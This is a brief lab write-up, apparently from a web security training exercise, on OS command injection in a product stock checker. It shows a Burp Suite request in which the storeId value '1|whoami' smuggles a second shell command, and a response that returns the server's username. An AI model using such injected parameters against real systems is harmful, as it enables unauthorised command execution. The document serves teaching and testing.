OS command injection, simple case

Description

This lab contains an OS command injection vulnerability in the product stock checker: The application executes a shell command containing user-supplied product and store IDs, and returns the raw output from the command in its response.

Reproduction and proof of concept

Use Burp Suite to intercept and modify a request that checks the stock level.
Modify the storeID parameter, giving it the value 1|whoami.

productId=1&storeId=1|whoami

Observe that the response contains the name of the current user.

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Connection: close
Content-Length: 13

peter-gmkX5d

Exploitability

An attacker will need to execute the whoami command to determine the name of the current user.